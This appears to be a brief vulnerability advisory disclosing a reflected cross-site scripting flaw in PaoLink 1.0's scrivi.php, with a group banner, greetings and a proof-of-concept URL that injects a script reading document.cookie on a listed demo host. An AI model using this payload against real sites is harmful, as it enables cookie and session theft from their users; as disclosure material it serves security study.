PaoLink version 1.0 suffers from a cross site scripting vulnerability.
21b52cc4769d4ace7ca8277c3e15403a1c8ece505685df86377d7886c2f8106f
/*
_____ _ ___ __
| ____|_ _(_) \ \ / /_ _ _ _
| _| \ \ / / | |\ \ /\ / / _` | | | |
| |___ \ V /| | | \ V V / (_| | |_| |
|_____| \_/ |_|_| \_/\_/ \__,_|\__, |
|___/
_____
|_ _|__ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Pao-Link V.1.0 Remote URI XSS Vulnerabilities
Discovered By : Moudi
Contact : <m0udi@9.cn>
Download : https://zenas.org
Greetings : Mizoz, Zuka, str0ke, 599eme Man.
Please visit: https://unkn0wn.ws/board/index.php
Please visit: https://ghost-squall.com
*/
[+] Exploit XSS:
- Vulnerable code in scrivi.php (/)
- Poc:
https://127.0.0.1/scrivi.php/[XSS]
https://zenas.org/paolink/demo/scrivi.php/"><script>alert(document.cookie);</script>